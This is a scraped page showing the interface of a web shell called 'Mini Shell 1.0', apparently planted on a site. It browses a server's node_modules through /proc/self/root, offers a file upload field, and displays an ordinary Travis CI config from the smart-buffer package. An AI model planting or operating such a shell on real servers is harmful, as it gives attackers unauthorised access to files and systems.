HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/local/lib/node_modules/pm2/node_modules/smart-buffer/
Upload File :
Current File : //proc/self/root/usr/local/lib/node_modules/pm2/node_modules/smart-buffer/.travis.yml
language: node_js
node_js:
  - 6
  - 8
  - 10
  - 12
  - stable

before_script:
  - npm install -g typescript
  - tsc -p ./

script: "npm run coveralls"